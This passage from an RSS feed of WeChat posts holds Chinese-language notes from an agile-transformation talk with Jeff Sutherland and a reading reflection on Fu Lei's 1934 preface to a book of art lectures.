lang="en-US">Deng Ying</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">Bosh</span><span lang="zh-CN">，硬件领域，敏捷转型，有保守、有激进等不同做法。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="zh-CN">敏捷团队，</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">最佳</span><span style="font-family:Calibri;" lang="en-US">5</span><span style="font-family:微软雅黑;" lang="yo">人，有的更多，团队怎么看</span><span style="font-family:微软雅黑;" lang="en-US"> </span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">把大团队打散，组成全职能团队。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">不要着急，先看到效率提升，或者如期交付就很好了。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">要实现</span><span lang="en-US">spotify</span><span lang="zh-CN">的模式很难，团队之间横向难打通，还没到</span><span lang="en-US">SAFE</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Lisa Wang</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: red;">利新易，破旧难</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">产品模块化，要解耦，团队不要绑定在一起</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">大家都要下刀</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">夏涛</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">开发、敏捷教练，转型咨询师</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: red;">转型是组织变革</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">不仅要懂scrum</span><span lang="zh-CN">的硬的东西</span><span lang="yo">，还要软技能，</span><span lang="zh-CN">软的部分很重要：管理，绩效、团队配置、敏捷转型是组织变革</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">不支持敏捷的人，怎么接触，怎么转变这些抵制者。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">组织变革管理，运营管理，对做好敏捷转型很重要</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Lisa Wang</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">Registered
Agile Coach</span><span lang="zh-CN">课程：敏捷教练课程，传授的是教练、引导、变革，引导工具，带团队，教练，</span><span lang="yo">忍住自己给direction的心</span><span lang="zh-CN">，要有这个专业技能。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">云加速</span><span lang="en-US"> Oliver</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Above DevOps
and Agile</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">产品线，打通vsm，底下是敏捷还是devops</span><span lang="zh-CN">、自动化</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="yo">中国领导喜欢hiarchy，micromanagement</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="yo">放权，小团队，sub
team， scrum team，silo取消</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">今天课后，云加速自己增加了信心，看见是第一件事，<span style="color:red;">车同轨、书同文地看见</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">不是看每日构建数、缺陷逃逸率，是看产品的流的质量，打通，</span><span lang="yo">看flow，而不是看局部的metrics，从flow看出</span><span lang="zh-CN">具体哪个环节出了</span><span lang="yo">问题</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Glen Wang</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="yo">vsm促进管理民主</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">联邦制</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">灵活自治，领导还有掌控感</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">数据要能看到每个团队的状态，怎么投钱。管住往哪个方向走</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">领导管做什么</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Lloyd Wu</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">做的事情越来越游戏化</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">族长，族长会</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">游戏就是及时反馈</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">旧的、传统组织存在的问题：如果没有人告诉他要做什么，他不敢随便乱动。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">敏捷强调：自组织、自管理</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Eric</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">设计背景</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">团队协作，纵向、横向协同的工作方式</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">怎么找到T型</span><span lang="zh-CN">多种技能</span><span lang="yo">的人</span><span lang="zh-CN">，这种人才很稀缺</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">T</span><span lang="zh-CN">型人才有擅长，对新事物充满热情</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">不要用有限的人生经验去评判无限的可能</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">思考好了，充分准备，试验的成本其实不高</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">向上管理，</span><span lang="yo">manager到leader</span><span lang="zh-CN">能力培养和转变</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">目标一致，路各自走。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: red;">焦虑的同时心怀远方</p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 11pt;" lang="en-US">Lisa Wang</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">招人，关键是</span><span lang="en-US">m</span><span lang="yo">indeset要open</span><span lang="zh-CN">，</span><span lang="en-US">i.e </span><span lang="zh-CN">马斯克自学，钻研学，比专业人士还高很多。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">sm</span><span lang="zh-CN">要</span><span lang="en-US">coach</span><span lang="zh-CN">的：</span><span style="color:red;" lang="zh-CN">长期主义，持续的，环环相扣，长期思维，慢慢往那个方向靠</span><span lang="zh-CN">，例如，不是在一个</span><span lang="en-US">sprint</span><span lang="zh-CN">就完成跨职能团队，而是让让团队越来越跨职能</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">TestOps</span><span lang="zh-CN">云层</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">勇敢承诺，勇敢学。同时，熬过创业期很难。要慢慢花时间才能做起来。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Lloyd Wu</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">专家和大师访谈，</span><span lang="yo">精彩都是q</span><span lang="en-US">&amp;a</span><span lang="zh-CN">部分</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">冻土层怎么解决，只要解决了，组织转型问题不大。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">敏捷没有新的内容，最基础、最核心的十年前甚至更早时间就定型了</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">敏捷这个领域的实践越来越扩大，不仅是机械式的框架、架构，还包括文化、团队、组织发展等核心</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">期待后续更精彩的活动</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Lisa Wang</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">感谢！小伙伴，新老朋友，会议后勤，</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="en-US">Fei Chen</p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="en-US">Jeff</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">是真神，每次都能学到新的东西，希望多看两遍视频</span></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5703703703703704" width="480" data-type="jpeg" data-w="1080" height="273" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=1e1316a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8WzYPn4DU8UpHsD7b4nQuBhwuf5tYHnDG56KmrRibJYAx2eZ2riahZ2Yw%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5601851851851852" width="480" data-type="jpeg" data-w="1080" height="268" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=2d799a66&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8mUDlWV2FBp7YDrIAvgJBcuQNxpzVmFHWwxdzALqAJ1pNLoMWLfGZJA%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5703703703703704" width="480" data-type="jpeg" data-w="1080" height="273" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=71317ed9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8E0KxV6ERGLWVID8wSZ4WJoMnsJXQLTmZXqeUBYiaKJmg9WgzPzpZic6Q%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5703703703703704" width="480" data-type="jpeg" data-w="1080" height="273" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=e991613e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8soA2DF1ZkHWLlSRnQmgyoawc40Uicm8s9Tgt6QgN90p8WznfUA7SwcQ%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5666666666666667" width="480" data-type="jpeg" data-w="1080" height="272" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=3bd63840&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8FSpsdH40C8pQsib1PzpyWLMhe073Ny5KFKYS6Rq2ZBIWfniaBHicXRBew%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 16pt;color: rgb(30, 78, 121);">笔记说明<br/></p><p>Jeff Sutherland和国内敏捷专家一起谈论了敏捷转型。作为社区搬运工，我鼓励大家再观看几次视频回放，并尝试做笔记，专注学习，避免“碎片化统合起来没有整体价值就是虚假繁忙”。社区举办了三场活动，都值得仔细品味。</p><h1 style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:16.0pt;color:#1E4E79;">网盘链接</h1><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><span lang="en-US">OneNote</span><span lang="zh-CN">及</span><span lang="en-US">PDF</span><span lang="zh-CN">格式的完整笔记链接：</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><span lang="zh-CN"><a href="https://pan.baidu.com/s/1zaRvJnzpWcQyqZMuPX1SHw?pwd=dnl6" target="_blank">https://pan.baidu.com/s/1zaRvJnzpWcQyqZMuPX1SHw?pwd=dnl6</a></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><span lang="zh-CN"><br/></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483716">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6a0bb40f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483716%26idx%3D1%26sn%3D7bbc7a326caad21285ac8397bad65dd5%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 11 Apr 2023 18:52:00 +0800</pubDate>
    </item>
    <item>
      <title>傅雷. 世界美术名作二十讲.序 - 读后感《百年巨变也百年未变》</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483695&amp;idx=1&amp;sn=5928c5b44d4eedeeb5d5cc6b825fcc89</link>
      <description>近读中国软件三十年、解读软件工程中的“反直觉”现象，晚上看傅雷. 世界美术名作二十讲.序，百年巨变且百年未变，有感而写备注。</description>
      <content:encoded><![CDATA[<p>
<span>不被绑在战车上面</span> <span>2023-04-06 23:17</span> <span style="display: inline-block;">上海</span>
</p>

<p>近读中国软件三十年、解读软件工程中的“反直觉”现象，晚上看傅雷. 世界美术名作二十讲.序，百年巨变且百年未变，有感而写备注。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=71ea4413&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzqf4JZcCOXyXdfVYm2jadFfd7XlVHXCkmQnWibs0O6mKIS9QslQk7Uvy4fk4sia9OIFv3RiaXNttp2Q%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="font-size: 14.6667px;font-family: &#34;Microsoft YaHei&#34;;">近读<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzU4NDY2MDMzMA==&amp;mid=2247491188&amp;idx=1&amp;sn=259a2a03a45747914ce2137fd1d381d9&amp;chksm=fd973a71cae0b3679c53c33d5c8eed7f99c4442afc749419569dd4b54c34bfb4fe7c86e991c3&amp;scene=21#wechat_redirect" textvalue="中国软件三十年：烟尘隐入，夹缝重生" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">中国软件三十年：烟尘隐入，夹缝重生</a>和<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzkzNDM1MDU3Mg==&amp;mid=2247484565&amp;idx=1&amp;sn=b9855a045ad3899b0a48abc4b0db7310&amp;chksm=c2bfdf16f5c8560099a894615e714b44f61c2de3eba5c7388c9bfac86a4c9253a40ebc03ac3c&amp;scene=21#wechat_redirect" textvalue="解读软件工程中的“反直觉”现象" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">解读软件工程中的“反直觉”现象</a>，晚上看傅雷. 世界美术名作二十讲.序，百年巨变也百年未变，有感而写备注。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="font-size: 14.6667px;font-family: &#34;Microsoft YaHei&#34;;">傅雷</span><span style="font-size: 14.6667px;font-family: Calibri;">. </span><span style="font-size: 14.6667px;font-family: &#34;Microsoft YaHei&#34;;">世界美术名作二十讲<span style="font-family: Calibri;font-size: 14.6667px;">.序</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">年来国人治西洋美术者日众，顾了解西洋美术之理论及历史者寥寥。</p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">好骛新奇之徒，惑于</span><span style="font-family:Calibri;font-size:11.0pt;">“</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">现代</span><span style="font-family:Calibri;font-size:11.0pt;">”</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">之为美名也，竞竞以</span><span style="font-family:Calibri;font-size:11.0pt;">“</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">立体</span><span style="font-family:Calibri;font-size:11.0pt;">”</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">、</span><span style="font-family:Calibri;font-size:11.0pt;">“</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">达达</span><span style="font-family:Calibri;font-size:11.0pt;">”</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">、</span><span style="font-family:Calibri;font-size:11.0pt;">“</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">表现</span><span style="font-family:Calibri;font-size:11.0pt;">”</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">诸派相标榜，沾沾以肖似某家某师自喜。</span><span style="font-size: 14px;color: rgb(255, 76, 65);font-family: &#34;Microsoft YaHei&#34;;">【思】此为醉心于实现他人造的概念，脑子成为别人的跑马地</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">肤浅庸俗之流，徒知悦目为美，工细为上，则又奉官学派为典型：坐井观天，莫此为甚！</span><span style="color: rgb(255, 76, 65);font-family: &#34;Microsoft YaHei&#34;;font-size: 14px;">【思】肤浅池浅，格局问题，生拉硬拽</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><br/></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">然而趋时守旧之途虽殊，</p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">其昧于历史因果，缺乏研究精神，拘囚于形式，竞竞于模仿则一也。</span><span style="color: rgb(255, 76, 65);font-family: &#34;Microsoft YaHei&#34;;font-size: 14px;">【思】华为任正非，先僵化，不失为谨愿</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">慨自</span><span style="font-family:Calibri;font-size:11.0pt;">“</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">五四</span><span style="font-family:Calibri;font-size:11.0pt;">”</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">以降，为学之态度随世风而日趋浇薄：投机取巧，习为故常；奸黠之辈且有以学术为猎取功名利禄之具者；</span><span style="color: rgb(255, 76, 65);font-family: &#34;Microsoft YaHei&#34;;font-size: 14px;">【思】某院士云，哪个鉴定会，结论不是国际一流、国内首创？</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">相形之下，则前之拘于形式，忠于模仿之学者犹不失为谨愿。呜呼！若是而欲望学术昌明，不将令人与河清无日之叹乎？</p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:&#34;Microsoft YaHei&#34;;">某也至愚，尝以为研究西洋美术，乃借触类旁通之功为创造中间新艺术之准备，而非即创造本身之谓也；而研究又非以五色纷披之彩笔曲肖马蒂斯、塞尚为能事也。夫一国艺术之产生，必时代、环境、传统演化，迫之产生，犹一国动植物之生长，必土质、气候、温度、雨量，使其生长。拉斐尔之生于文艺复兴期之意大利，莫里哀之生于</span><span style="font-family:Calibri;">17</span><span style="font-family:&#34;Microsoft YaHei&#34;;">世纪之法兰西，亦犹橙橘橄林之遍于南国，事有必至，理有固然也。陶潜不生于西域，但丁不生于中土，形格势禁，事理环境民族利之所不容也。此研究西洋艺术所不可不知者一。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:&#34;Microsoft YaHei&#34;;">至欲撷取外来艺术之精英而融为已有，则必经时势之推移，思想之酝酿，而在心理上又必经直觉、理解、憬悟、贯通诸程序，方能衷心有所真感。观夫马奈、凡</span><span style="font-family:Calibri;">·</span><span style="font-family:&#34;Microsoft YaHei&#34;;">高之于日本版画，高庚之于黑人艺术，盖无不由斯途以臻于创造新艺之境。此研究西洋艺术所不可不知者二。</span><span style="font-size: 14px;color: rgb(255, 76, 65);font-family: &#34;Microsoft YaHei&#34;;">【思】联系实际，教条无用。土生土长，解决问题，才有生命力</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">今也东西艺术，技术形式既不同，所启发之境界复大异，所表白之心灵情操，又有民族性之差别为其基础。可见所谓融合中西艺术之口号，未免言之过早，盖今之艺人，犹沦于中西文化冲突后之漩涡中不能自拔，调和云何哉？矧吾人之于西方艺术，迄今犹未臻理解透辟之域，遑言创造乎？<span style="font-size: 14px;color: rgb(255, 76, 65);">【思】外国的先进技术和理念，学会了皮毛还是精髓。解决了问题还是制造了新困难。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">然而今日之言调和东西艺术者，提倡古典或现代化者，固比比皆是，是一知半解，不假深思之过耳。世唯有学殖湛深之士方能知学问之无穷而常惴惴默默，惧一言之失有损乎学术尊严，亦唯有此惴惴默默之辈，方能孜孜矻矻，树百年之基。某不敏，何敢以此自许？特念古人三年之病必求七年之艾之训，故愿执斩荆棘，辟草莽之役，为艺界同仁尽些微之力耳。是编之成，即本斯义。编分二十讲，</p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">所述皆名家杰构，凡绘画雕塑建筑装饰美术诸门，遍尝一脔。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">间亦论及作家之人品学问，欲以表显艺人之操守与修养也，</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">亦有涉及时代与环境，明艺术发生之因果也，</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">历史叙述，理论阐发，兼顾并重，示研究工作之重要也。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">愚固知画家不必为史家，犹史家之不必为画家；然史之名画家固无一非稔知艺术源流与技术精义者，此其作品之所以必不失其时代意识，所以在历史上必为承前启后之关键也。    </span></p></li></ul><p><span style="color: rgb(255, 76, 65);font-family: &#34;Microsoft YaHei&#34;;font-size: 14px;">【思】开阔视野，知道优劣；了解创业者的故事，激励我心；历史（案例、问题）叙述，理论阐发；了解源流，精通技术；继旧开新，承前启后。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:&#34;Microsoft YaHei&#34;;">是编参考书，有法国博尔德（</span><span style="font-family:Calibri;">Bordes</span><span style="font-family:&#34;Microsoft YaHei&#34;;">）氏之美术史讲话及晚近诸家之美术史。序中所言，</span><span style="color: rgb(255, 76, 65);font-family: &#34;Microsoft YaHei&#34;;">容有致艺坛诸君子于不快者，则唯有以爱真理甚于爱友一语自谢耳</span><span style="font-family:&#34;Microsoft YaHei&#34;;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:&#34;Microsoft YaHei&#34;;">傅雷</span><span style="font-family:Calibri;"> 1934</span><span style="font-family:&#34;Microsoft YaHei&#34;;">年</span><span style="font-family:Calibri;">6</span><span style="font-family:&#34;Microsoft YaHei&#34;;">月</span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483695">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=ec81d91f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483695%26idx%3D1%26sn%3D5928c5b44d4eedeeb5d5cc6b825fcc89%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 06 Apr 2023 23:17:00 +0800</pubDate>
    </item>
  </channel>
</rss>